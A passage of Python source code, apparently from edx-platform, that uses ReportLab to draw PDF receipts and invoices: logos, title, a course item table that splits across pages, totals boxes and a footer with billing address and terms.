self.page_width - (self.margin * 2), self.page_height - (self.margin * 2),
stroke=True, fill=False)
@staticmethod
def load_image(img_path):
"""
Loads an image given a path. An absolute path is assumed.
If the path points to an image file, it loads and returns the Image object, None otherwise.
"""
try:
img = Image.open(img_path)
except IOError as ex:
log.exception('Pdf unable to open the image file: %s', str(ex))
img = None
return img
def draw_logos(self):
"""
Draws logos.
"""
horizontal_padding_from_border = self.margin + 9 * mm
vertical_padding_from_border = 11 * mm
img_y_pos = self.page_height - (
self.margin + vertical_padding_from_border + max(self.cobrand_logo_height, self.brand_logo_height)
)
# Left-Aligned cobrand logo
if self.cobrand_logo_path:
cobrand_img = self.load_image(self.cobrand_logo_path)
if cobrand_img:
img_width = float(cobrand_img.size[0]) / (float(cobrand_img.size[1]) / self.cobrand_logo_height)
self.pdf.drawImage(cobrand_img.filename, horizontal_padding_from_border, img_y_pos, img_width,
self.cobrand_logo_height, mask='auto')
# Right aligned brand logo
if self.logo_path:
logo_img = self.load_image(self.logo_path)
if logo_img:
img_width = float(logo_img.size[0]) / (float(logo_img.size[1]) / self.brand_logo_height)
self.pdf.drawImage(
logo_img.filename,
self.page_width - (horizontal_padding_from_border + img_width),
img_y_pos,
img_width,
self.brand_logo_height,
mask='auto'
)
return img_y_pos - self.min_clearance
def draw_title(self, y_pos):
"""
Draws the title, order/receipt ID and the date.
"""
if self.is_invoice:
title = (_('Invoice'))
id_label = (_('Invoice'))
else:
title = (_('Receipt'))
id_label = (_('Order'))
# Draw Title "RECEIPT" OR "INVOICE"
vertical_padding = 5 * mm
horizontal_padding_from_border = self.margin + 9 * mm
font_size = 21
self.pdf.setFontSize(font_size)
self.pdf.drawString(horizontal_padding_from_border, y_pos - vertical_padding - font_size / 2, title)
y_pos = y_pos - vertical_padding - font_size / 2 - self.min_clearance
horizontal_padding_from_border = self.margin + 11 * mm
font_size = 12
self.pdf.setFontSize(font_size)
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Order/Invoice No.
self.pdf.drawString(horizontal_padding_from_border, y_pos,
_(u'{id_label} # {item_id}').format(id_label=id_label, item_id=self.item_id))
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Date
self.pdf.drawString(
horizontal_padding_from_border, y_pos, _(u'Date: {date}').format(date=self.date)
)
return y_pos - self.min_clearance
def draw_course_info(self, y_pos):
"""
Draws the main table containing the data items.
"""
course_items_data = [
['', (_('Description')), (_('Quantity')), (_('List Price\nper item')), (_('Discount\nper item')),
(_('Amount')), '']
]
for row_item in self.items_data:
course_items_data.append([
'',
Paragraph(row_item['item_description'], getSampleStyleSheet()['Normal']),
row_item['quantity'],
'{currency}{list_price:.2f}'.format(list_price=row_item['list_price'], currency=self.currency),
'{currency}{discount:.2f}'.format(discount=row_item['discount'], currency=self.currency),
'{currency}{item_total:.2f}'.format(item_total=row_item['item_total'], currency=self.currency),
''
])
padding_width = 7 * mm
desc_col_width = 60 * mm
qty_col_width = 26 * mm
list_price_col_width = 21 * mm
discount_col_width = 21 * mm
amount_col_width = 40 * mm
course_items_table = Table(
course_items_data,
[
padding_width,
desc_col_width,
qty_col_width,
list_price_col_width,
discount_col_width,
amount_col_width,
padding_width
],
splitByRow=1,
repeatRows=1
)
course_items_table.setStyle(TableStyle([
# List Price, Discount, Amount data items
('ALIGN', (3, 1), (5, -1), 'RIGHT'),
# Amount header
('ALIGN', (5, 0), (5, 0), 'RIGHT'),
# Amount column (header + data items)
('RIGHTPADDING', (5, 0), (5, -1), 7 * mm),
# Quantity, List Price, Discount header
('ALIGN', (2, 0), (4, 0), 'CENTER'),
# Description header
('ALIGN', (1, 0), (1, -1), 'LEFT'),
# Quantity data items
('ALIGN', (2, 1), (2, -1), 'CENTER'),
# Lines below the header and at the end of the table.
('LINEBELOW', (0, 0), (-1, 0), 1.00, '#cccccc'),
('LINEBELOW', (0, -1), (-1, -1), 1.00, '#cccccc'),
# Innergrid around the data rows.
('INNERGRID', (1, 1), (-2, -1), 0.50, '#cccccc'),
# Entire table
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TOPPADDING', (0, 0), (-1, -1), 2 * mm),
('BOTTOMPADDING', (0, 0), (-1, -1), 2 * mm),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
]))
rendered_width, rendered_height = course_items_table.wrap(0, 0)
table_left_padding = (self.page_width - rendered_width) / 2
split_tables = course_items_table.split(0, self.first_page_available_height)
if len(split_tables) > 1:
# The entire Table won't fit in the available space and requires splitting.
# Draw the part that can fit, start a new page
# and repeat the process with the rest of the table.
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
while len(split_tables) > 1:
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
else:
# Table will fit without the need for splitting.
course_items_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
if not self.is_on_first_page():
y_pos = self.second_page_start_y_pos
return y_pos - rendered_height - self.min_clearance
def prepare_new_page(self):
"""
Inserts a new page and includes the border and the logos.
"""
self.pdf.insert_page_break()
self.draw_border()
y_pos = self.draw_logos()
return y_pos
def draw_totals(self, y_pos):
"""
Draws the boxes containing the totals and the tax id.
"""
totals_data = [
[(_('Total')), self.total_cost],
[(_('Payment Received')), self.payment_received],
[(_('Balance')), self.balance]
]
if self.is_invoice:
# only print TaxID if we are generating an Invoice
totals_data.append(
['', '{tax_label}: {tax_id}'.format(tax_label=self.tax_label, tax_id=self.tax_id)]
)
heights = 8 * mm
totals_table = Table(totals_data, 40 * mm, heights)
styles = [
# Styling for the totals table.
('ALIGN', (0, 0), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
# Styling for the Amounts cells
# NOTE: since we are not printing the TaxID for Credit Card
# based receipts, we need to change the cell range for
# these formatting rules
('RIGHTPADDING', (-1, 0), (-1, 2), 7 * mm),
('GRID', (-1, 0), (-1, 2), 3.0, colors.white),
('BACKGROUND', (-1, 0), (-1, 2), '#EEEEEE'),
]
totals_table.setStyle(TableStyle(styles))
__, rendered_height = totals_table.wrap(0, 0)
left_padding = 97 * mm
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
# if space left on page is smaller than the rendered height, render the table on the next page.
self.prepare_new_page()
totals_table.drawOn(self.pdf, self.margin + left_padding, self.second_page_start_y_pos - rendered_height)
return self.second_page_start_y_pos - rendered_height - self.min_clearance
else:
totals_table.drawOn(self.pdf, self.margin + left_padding, y_pos - rendered_height)
return y_pos - rendered_height - self.min_clearance
def draw_footer(self, y_pos):
"""
Draws the footer.
"""
para_style = getSampleStyleSheet()['Normal']
para_style.fontSize = 8
footer_para = Paragraph(self.footer_text.replace("\n", "<br/>"), para_style)
disclaimer_para = Paragraph(self.disclaimer_text.replace("\n", "<br/>"), para_style)
billing_address_para = Paragraph(self.billing_address_text.replace("\n", "<br/>"), para_style)
footer_data = [
['', footer_para],
[(_('Billing Address')), ''],
['', billing_address_para],
[(_('Disclaimer')), ''],
['', disclaimer_para]
]
footer_style = [
# Styling for the entire footer table.
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
('FONTSIZE', (0, 0), (-1, -1), 9),
('TEXTCOLOR', (0, 0), (-1, -1), '#AAAAAA'),
# Billing Address Header styling
('LEFTPADDING', (0, 1), (0, 1), 5 * mm),
# Disclaimer Header styling
('LEFTPADDING', (0, 3), (0, 3), 5 * mm),
('TOPPADDING', (0, 3), (0, 3), 2 * mm),
# Footer Body styling
# ('BACKGROUND', (1, 0), (1, 0), '#EEEEEE'),
# Billing Address Body styling
('BACKGROUND', (1, 2), (1, 2), '#EEEEEE'),
# Disclaimer Body styling
('BACKGROUND', (1, 4), (1, 4), '#EEEEEE'),
]
if self.is_invoice:
terms_conditions_para = Paragraph(self.terms_conditions_text.replace("\n", "<br/>"), para_style)
footer_data.append([(_('TERMS AND CONDITIONS')), ''])
footer_data.append(['', terms_conditions_para])
# TERMS AND CONDITIONS header styling
footer_style.append(('LEFTPADDING', (0, 5), (0, 5), 5 * mm))
footer_style.append(('TOPPADDING', (0, 5), (0, 5), 2 * mm))
# TERMS AND CONDITIONS body styling
footer_style.append(('BACKGROUND', (1, 6), (1, 6), '#EEEEEE'))
footer_table = Table(footer_data, [5 * mm, 176 * mm])
footer_table.setStyle(TableStyle(footer_style))
__, rendered_height = footer_table.wrap(0, 0)
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
self.prepare_new_page()
footer_table.drawOn(self.pdf, self.margin, self.margin + 5 * mm)
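# Minimal usage sketch (illustrative; assumes Django settings and the
# PDF_RECEIPT_* values referenced in __init__ are configured, as they are in
# an edx-platform deployment):
#   from cStringIO import StringIO
#   import datetime
#   buf = StringIO()
#   PDFInvoice(
#       items_data=[{'item_description': 'Demo Course', 'quantity': 1,
#                    'list_price': 100.0, 'discount': 10.0, 'item_total': 90.0}],
#       item_id='1000', date=datetime.datetime.now(), is_invoice=True,
#       total_cost=90.0, payment_received=90.0, balance=0.0,
#   ).generate_pdf(buf)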
| agpl-3.0 |